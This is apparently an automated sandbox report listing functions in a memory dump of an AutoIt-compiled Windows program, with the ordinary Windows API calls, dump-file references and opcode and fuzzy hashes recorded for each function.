                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free
                                                    • String ID:
                                                    • API String ID: 3328510275-0
                                                    • Opcode ID: 939aa6d522ad871ad83ee6bde8d3fc5b2d704f5281a2ec6916904227d7ee8121
                                                    • Instruction ID: f1e361c73647d89abd7cf723ba305d3e6f4e21497a91bb1527ef613e2f202165
                                                    • Opcode Fuzzy Hash: 939aa6d522ad871ad83ee6bde8d3fc5b2d704f5281a2ec6916904227d7ee8121
                                                    • Instruction Fuzzy Hash: BAF0BB73D05518BADB326BA5AC59DFBBB3CDD92364316013AFB0D53400E6221D4082F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D2E02, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 003D2E1A
                                                      • Part of subcall function 003D0B30: PeekMessageW.USER32 ref: 003D0BBB
                                                    • Sleep.KERNEL32(00000000), ref: 003D2E53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessagePeekSleepTimetime
                                                    • String ID:
                                                    • API String ID: 1792118007-0
                                                    • Opcode ID: d7bebd9428e8fb38487a8927cdd100ecb6f16965f2017741bd6b4eed88b51a55
                                                    • Instruction ID: f1d1bf4f9a0237154fdf486f02d8e74260b836ff7f8855be0c34814a8a106201
                                                    • Opcode Fuzzy Hash: d7bebd9428e8fb38487a8927cdd100ecb6f16965f2017741bd6b4eed88b51a55
                                                    • Instruction Fuzzy Hash: 6FF08C322446019FC350EB78E459F66BBE8AF45760F02403AE82DCB362CB70EC04CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E2F95, Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FA9
                                                    • GetLastError.KERNEL32(00000000,?,003E9C64,00000000,003E8D6D,003E59D3,?,?,003E1013,?), ref: 003E2FBB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: 0cc72d5163f9f15b326808b1bc763bd71eead38afe0f41e60ddb88094a47870e
                                                    • Instruction ID: ecc4d16bca16e29c796495f20c7af2bead54904ebca35b5108cb36832ff70b9f
                                                    • Opcode Fuzzy Hash: 0cc72d5163f9f15b326808b1bc763bd71eead38afe0f41e60ddb88094a47870e
                                                    • Instruction Fuzzy Hash: 2DE0C236104568AADB123FA1FC0ABEE3BACEB11391F210439F10D940E0CB320191C7A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043DD64, Relevance: 1.7, APIs: 1, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: _strcat
                                                    • String ID:
                                                    • API String ID: 1765576173-0
                                                    • Opcode ID: 79f4e20d09c3ca268a9a154bce9825be48bf67147a1f17c1257c7619b33d43b7
                                                    • Instruction ID: 67363804725a452fe1444a39c12a323f70d323c41649f2b8778bb78f3b0c8773
                                                    • Opcode Fuzzy Hash: 79f4e20d09c3ca268a9a154bce9825be48bf67147a1f17c1257c7619b33d43b7
                                                    • Instruction Fuzzy Hash: EA913671A001149FCB19DF18E585EAABBF4EF59314B51946EF80ACF2A6DB34ED01CB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00425E1C, Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00000000,00000000,?,?,?,?,00427A0A,?,?,0043E864,?,00000000), ref: 00425E35
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID:
                                                    • API String ID: 2358735015-0
                                                    • Opcode ID: 3cb9a13705556b05894f0610b3ffd7e91eb8d23d614d73b18e7b2705896ad140
                                                    • Instruction ID: 23e8de2be4752b8c021995208151ff9d79255c8a6f0ea607b6115280cb6101b7
                                                    • Opcode Fuzzy Hash: 3cb9a13705556b05894f0610b3ffd7e91eb8d23d614d73b18e7b2705896ad140
                                                    • Instruction Fuzzy Hash: 5541D7B2604619AEDB21EF64EC809ABB7BCFF04364B61862FF511D6140DB349F41CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C9E9C, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01fa66b80c31145136f6e860bce58760a00786db3c4182a8688cbe99f262cd9d
                                                    • Instruction ID: c4880950925ba016a5871c232ee209dc0007e0135a76e23d166a542617ca2482
                                                    • Opcode Fuzzy Hash: 01fa66b80c31145136f6e860bce58760a00786db3c4182a8688cbe99f262cd9d
                                                    • Instruction Fuzzy Hash: AE318436000104DEDA37EB25D889F77B7A9EF61391727452FE596CA862CB31AC80DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5C4E, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,?,?,?,00000000,?,?,00000000), ref: 003C5CF6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: e9f783d2ae54c20b0003a3c1e8452e52cf04e397327773ef3ffef3f04f0cdc43
                                                    • Instruction ID: bfe33682c035f63ccb164d37654e67c8dbf2afcdb1d6dbbf3cdd959309fdc351
                                                    • Opcode Fuzzy Hash: e9f783d2ae54c20b0003a3c1e8452e52cf04e397327773ef3ffef3f04f0cdc43
                                                    • Instruction Fuzzy Hash: F3313C71A00B0AAFDB19CF69D884FAEB7B5FB44320F158629E819D7610D731BD90DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004000D6, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: f70777347032e811a839a0ed4c16abeb1ea5b53be2d13886227d253cabfe5ddb
                                                    • Instruction ID: 5e9489cd4f920639f5a203219d0ffe4c467cdc1422e82651006d120a37906501
                                                    • Opcode Fuzzy Hash: f70777347032e811a839a0ed4c16abeb1ea5b53be2d13886227d253cabfe5ddb
                                                    • Instruction Fuzzy Hash: CC410474508751CFDB25CF24C488B1ABBE0AF45318F0989ADE88A9B762C336EC45CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C73E5, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 003FEEAC
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                      • Part of subcall function 003E09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E09F4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen
                                                    • String ID:
                                                    • API String ID: 779396738-0
                                                    • Opcode ID: 25ebce270dfb0b1566c3b5d41d23de26659e59beda424a5e31fdbe0999b75de4
                                                    • Instruction ID: 725858cc6525cb4da1adcef3b466cbf790b236c9512ccc50310be63f7c5a7cb9
                                                    • Opcode Fuzzy Hash: 25ebce270dfb0b1566c3b5d41d23de26659e59beda424a5e31fdbe0999b75de4
                                                    • Instruction Fuzzy Hash: EE21D731900258AADB169FD1DC05FEFBBBCDF46311F00806AF508EA141DBB559498F70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4F3D, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C4D13: FreeLibrary.KERNEL32(00000000,?,003C4F4F,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D4D
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4F6F
                                                      • Part of subcall function 003C4CC8: FreeLibrary.KERNEL32(00000000,003FDD1E,00000000,004862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,00000000,00000001), ref: 003C4D02
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Library$Free$Load
                                                    • String ID:
                                                    • API String ID: 2391024519-0
                                                    • Opcode ID: fc1a6256ed2e668e58b8ed99ffb328d9942f992b73bc5840541cfe4aae018be9
                                                    • Instruction ID: f0bf2d4e955dba22eacf287e5316a6d02a9218f3b99849868c42f12d4fab96a3
                                                    • Opcode Fuzzy Hash: fc1a6256ed2e668e58b8ed99ffb328d9942f992b73bc5840541cfe4aae018be9
                                                    • Instruction Fuzzy Hash: 8A112732600209BADB12FFB1EC56FAEB7A8DF40711F20842EF542E94C1DA325A049B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E54A0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003E552B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID:
                                                    • API String ID: 4062629308-0
                                                    • Opcode ID: 8b1e5d093b3b6bfaebd4f36366d849a4322223a6c331f0dce4690579c3cdfcd2
                                                    • Instruction ID: f1a8491140e18a88d50f7b63cea0175024939262f512881f500a87f562c4220b
                                                    • Opcode Fuzzy Hash: 8b1e5d093b3b6bfaebd4f36366d849a4322223a6c331f0dce4690579c3cdfcd2
                                                    • Instruction Fuzzy Hash: 67113D71D00369AEDB13BFBB8C0166F77A89F41320F118715A519EB1C1DA3489409B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004001AF, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 898eacce41359d4a34805d8d72ccd5a55429f6b57943ec43ccb608fe0e4522b2
                                                    • Instruction ID: dae234c3a5f72f32e48f4b275380fc54190937f364b9397b56cc2f4117916300
                                                    • Opcode Fuzzy Hash: 898eacce41359d4a34805d8d72ccd5a55429f6b57943ec43ccb608fe0e4522b2
                                                    • Instruction Fuzzy Hash: 38211274508341CFCB16DF24C444B1ABBE0BF84308F05896DE98A9B761C731EC49CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E594C, Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,?,?,?,?,003E1013,?), ref: 003E598F
                                                      • Part of subcall function 003EA408: GetModuleFileNameW.KERNEL32(?,004843BA,00000104,?,00000001,00000000), ref: 003EA49A
                                                      • Part of subcall function 003E32DF: ExitProcess.KERNEL32 ref: 003E32EE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AllocateExitFileHeapModuleNameProcess
                                                    • String ID:
                                                    • API String ID: 1715456479-0
                                                    • Opcode ID: 52f216419c216d513875ae52463187bf684ffcd73874ef9eeb68639481bebbbd
                                                    • Instruction ID: 1cce62d6cd2cc4f3e43b07ad8162a82f7fef7b0ee78cd99827a3793db4749529
                                                    • Opcode Fuzzy Hash: 52f216419c216d513875ae52463187bf684ffcd73874ef9eeb68639481bebbbd
                                                    • Instruction Fuzzy Hash: 7001C432201AB6EEE6133B73EC41AAE3348CF527B9F11072AF404AE1C2DB705D005669
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CB93D, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00401054
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID:
                                                    • API String ID: 2353593579-0
                                                    • Opcode ID: e2337375fdcb5d92b41c9ab07e4dba488a6dfd0ff0aba09e147941ec613f6653
                                                    • Instruction ID: 05e8302965a7c3963da68737b9c40b9ff10bd872adefa5873c371ec0ed07f168
                                                    • Opcode Fuzzy Hash: e2337375fdcb5d92b41c9ab07e4dba488a6dfd0ff0aba09e147941ec613f6653
                                                    • Instruction Fuzzy Hash: D011CEB2201556BED71AAB30EC85EFAFB6CFB05394F00052BF559D5060C731AA24C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5D20, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000000,00010000,?,00000000,00000000,?,00010000,?,003C5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 003C5D76
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 20f27882e49b2d576803f4432f784918bd4e81cb35b9eb443d7d5fa562828c17
                                                    • Instruction ID: 076a9aad42c7246a3c87e84233ed5e73eaec66848dea3d24fb1065c3428e7088
                                                    • Opcode Fuzzy Hash: 20f27882e49b2d576803f4432f784918bd4e81cb35b9eb443d7d5fa562828c17
                                                    • Instruction Fuzzy Hash: 4C112571204B019FD3329F05C888F62BBE9EB45760F10892EE4AB8AA50D771FD85CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004044A4, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 2685eb10da9238003343a3300721150ca984b3bd90e0bbfea4fa4f9b81b8eae0
                                                    • Instruction ID: c29f8121602521776c3f39ca5dcb058ac4d0998c679c8834dae4684b3a97ad6f
                                                    • Opcode Fuzzy Hash: 2685eb10da9238003343a3300721150ca984b3bd90e0bbfea4fa4f9b81b8eae0
                                                    • Instruction Fuzzy Hash: 3F01C47AA00118CFDF22DB84D884FBDB3F6EB51360B56842AE959EB640C731ED41CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C83A8, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(00000000,?,00000000,?,-00000003,?,003D3FC9,00000000,?,?,-00000003,00000000,00000000), ref: 003C83E0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID:
                                                    • API String ID: 3964851224-0
                                                    • Opcode ID: a8c0223343184ffe51df759d2b4fd00b45c3df0fd18c1506851a8e1bb3c26bf8
                                                    • Instruction ID: 3148efbf25b0c9e11bd786438e77e2e1c3fe53dd4dd2df07f57662d1bb73d436
                                                    • Opcode Fuzzy Hash: a8c0223343184ffe51df759d2b4fd00b45c3df0fd18c1506851a8e1bb3c26bf8
                                                    • Instruction Fuzzy Hash: 2CF0C87A105622ABD3265B95DC01F57FB98EF05BA1F10453EF644D5440CF31D820CBD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004045A9, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: de8cdbe651be7bb9cf4f64f028a37391a0641722708f31b07f77593dc295c7de
                                                    • Instruction ID: f963e02b9259e431b43d49eda226b1f86e1c4fa26c2af2e0682b2a4052c08976
                                                    • Opcode Fuzzy Hash: de8cdbe651be7bb9cf4f64f028a37391a0641722708f31b07f77593dc295c7de
                                                    • Instruction Fuzzy Hash: 61F0E57A600158CFDF219FC4E844FBAB7E8DF01361F10043AE545EB500C732AC408B51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402587, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 5d7a4175efdd34d28f31ec5a894d023880474e674a8e34b49507ab5bc9e6f712
                                                    • Instruction ID: 81a4c59f4b699a03c2e59eb9ae5f6ac0d41304315c22ca1b09c7a0c7791cc667
                                                    • Opcode Fuzzy Hash: 5d7a4175efdd34d28f31ec5a894d023880474e674a8e34b49507ab5bc9e6f712
                                                    • Instruction Fuzzy Hash: 9EF05572614049AEE7208B70A80CF72F788DB10315F20003FE085C14C0CBBA5C849366
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C4FAA, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 2748ad0215ee40832e02f6083ef4d7b7d7e69c59aa4b8bd34c2ad702cd32eb2c
                                                    • Instruction ID: 664fe98a39a6ce804ef296bd74da224bea2b8c178d04879d1fccd3a02429dafc
                                                    • Opcode Fuzzy Hash: 2748ad0215ee40832e02f6083ef4d7b7d7e69c59aa4b8bd34c2ad702cd32eb2c
                                                    • Instruction Fuzzy Hash: FFF01571004711CFCB369F64E8A5D52BBE5BB013293208A3EE1DB82A10C732AC44DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E09D5, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
